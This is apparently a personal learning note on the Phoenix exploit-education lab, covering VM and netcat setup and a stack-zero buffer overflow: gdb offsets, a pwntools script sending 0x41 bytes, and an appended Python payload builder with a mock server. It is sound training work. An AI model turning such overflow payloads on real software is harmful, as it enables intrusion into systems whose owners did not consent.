BuringStraw

[pwn Notes 0] Phoenix Environment Setup and stack-zero

I found a project for learning pwn at http://exploit.education and decided to spend some time on pwn to get back on track. I'll try to start a series of notes (I always forget how to write pwntools scripts) and hopefully won't give up halfway. Let's set a small goal: at least finish the Phoenix series.

## Environment Setup

First, download the Phoenix virtual machine image from the more-downloads section, choosing the one for your architecture. This will be the target machine. Before starting, install qemu-system-x86 (on Arch Linux the 64-bit emulator is in the same package).

Run the boot-*.sh script that ships with the image to start the virtual machine; by default it forwards ssh to port 2222. The username and password are both "user".

If you want to expose the programs inside the VM through netcat, add another port forward to the startup script. Here is an example of the network line:

```
-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333
```

Then, inside the virtual machine, create a named pipe:

```
mkfifo io
```

And create a script file (start.sh):

```bash
#!/bin/bash
# Usage: sh start.sh <program>
# Wire the program's stdin/stdout to a TCP listener through the "io" fifo:
# nc writes whatever it receives into io, cat feeds that to the program, and
# the program's output (with stderr merged in) goes back out through nc.
# The "-i" is passed through to $1 as a plain argument.
cat io | $1 -i 2>&1 | nc -l 3333 > io
```

Now you can start the listener with sh start.sh /opt/phoenix/amd64/stack-zero; make sure the port 3333 here matches the one in the startup script.

The gdb in the virtual machine comes with gef installed by default, but I don't know how to use it, so I copied peda into it. I'll skip this part.

On the host machine, install a very convenient tool called pwntools:

```
pip install pwntools
```

## stack-zero

The program is quite simple; I opened it directly in Cutter.

![Screenshot_Region_20230215183930.png](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Screenshot_Region_20230215183930.png)

(Actually, the source code is provided on the exploit.education website, and the comment at the top of it is even a joke.)

Now we need to overflow s into var_10h (changeme); the content can be anything. Open gdb, work out the distance between the two, and first feed in something random.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled.png)

The string buffer is at 0x620.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%201.png)

In the conditional check, changeme is at rbp-0x10, i.e. 0x670-0x10 = 0x660.

So the distance is 0x660-0x620 = 0x40.

So we just need to send 0x41 'a's: 0x40 to fill the buffer and one more to land in changeme.

To practice pwntools, let's write some code. Here I connected directly over ssh, so nc is not needed.

```python
from pwn import *

# ssh into the Phoenix VM using the forwarded port from the startup script
shell = ssh("user", "localhost", password="user", port=2222)
# run the target binary on the VM and get a tube to its stdin/stdout
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())            # banner line
sh.sendline(b"a" * 0x41)        # 0x40 bytes fill the buffer, one more hits changeme
print(sh.recvline())            # the program's verdict
shell.close()
```

Success!

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%202.png)
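As an added example (not code from the original post), here is a plain-Python version of the same steps that runs without pwntools: it computes the padding from the offsets read off gdb above (buffer at 0x620, rbp at 0x670, changeme at rbp-0x10), builds the 0x41-byte payload, simulates the frame to show why 0x40 bytes alone leave changeme at zero while 0x41 changes it, and talks to the nc forwarder from the environment section over a raw socket. The host 127.0.0.1 and port 3333 are the forwarding values from the startup script; the mock server with its banner and verdict strings is a constructed stand-in for the real stack-zero binary so the script can be exercised offline. The padding function is written generally (any buffer address, frame pointer and rbp-relative offset), which goes beyond the single case in the post.

```python
import socket
import threading

# Frame layout read off gdb in the post (low bits of the addresses shown there).
BUFFER_ADDR = 0x620      # where gets() starts writing the input string
RBP_ADDR = 0x670         # saved frame pointer
CHANGEME_OFF = 0x10      # changeme sits at rbp-0x10


def padding_length(buffer_addr=BUFFER_ADDR, rbp_addr=RBP_ADDR, var_offset=CHANGEME_OFF):
    """Bytes between the start of the buffer and the variable at rbp-var_offset."""
    target = rbp_addr - var_offset
    if target <= buffer_addr:
        raise ValueError("variable is not above the buffer; a forward overflow cannot reach it")
    return target - buffer_addr      # 0x40 for stack-zero


def build_payload(filler=b"a"):
    """Padding plus one extra byte, so the last byte written lands in changeme."""
    return filler * (padding_length() + 1)      # 0x41 bytes, as in the post


def changeme_after_write(line):
    """Simulate the frame: value of the 4-byte int changeme after gets() copies `line`."""
    frame = bytearray(RBP_ADDR - BUFFER_ADDR)   # buffer up to the saved rbp
    target = padding_length()
    frame[target:target + 4] = b"\x00" * 4      # changeme starts out as 0
    frame[0:len(line) + 1] = line + b"\x00"     # gets() copies the line plus a NUL, unbounded
    return int.from_bytes(frame[target:target + 4], "little")


def send_payload(host="127.0.0.1", port=3333, payload=None):
    """Client for the nc forwarder: read the banner line, send the payload, read the verdict."""
    if payload is None:
        payload = build_payload()
    with socket.create_connection((host, port), timeout=5) as s:
        reader = s.makefile("rb")
        banner = reader.readline()
        s.sendall(payload + b"\n")              # the newline ends the gets() call
        verdict = reader.readline()
        reader.close()
    return banner, verdict


def _mock_stack_zero(conn):
    """Constructed stand-in with the same banner/line/verdict flow; not the real program's text."""
    with conn:
        conn.sendall(b"mock stack-zero: send a line\n")
        data = b""
        while not data.endswith(b"\n"):
            chunk = conn.recv(4096)
            if not chunk:
                break
            data += chunk
        if changeme_after_write(data.rstrip(b"\n")) != 0:
            conn.sendall(b"changeme was changed\n")
        else:
            conn.sendall(b"changeme is still zero\n")


def run_mock_server():
    """Serve one connection of the mock on a free loopback port in the background; return the port."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        _mock_stack_zero(conn)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Offline demo against the mock; against the VM call send_payload() with the forwarded port.
    port = run_mock_server()
    banner, verdict = send_payload(port=port)
    print(banner.decode().strip())
    print(verdict.decode().strip())
```

Against the real VM, `send_payload()` with the default host and port talks to the start.sh listener from the environment section; the simulation in `changeme_after_write` is only there to make the arithmetic visible, and it shows that sending exactly 0x40 bytes puts only the NUL terminator into changeme, which is why the post sends 0x41.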
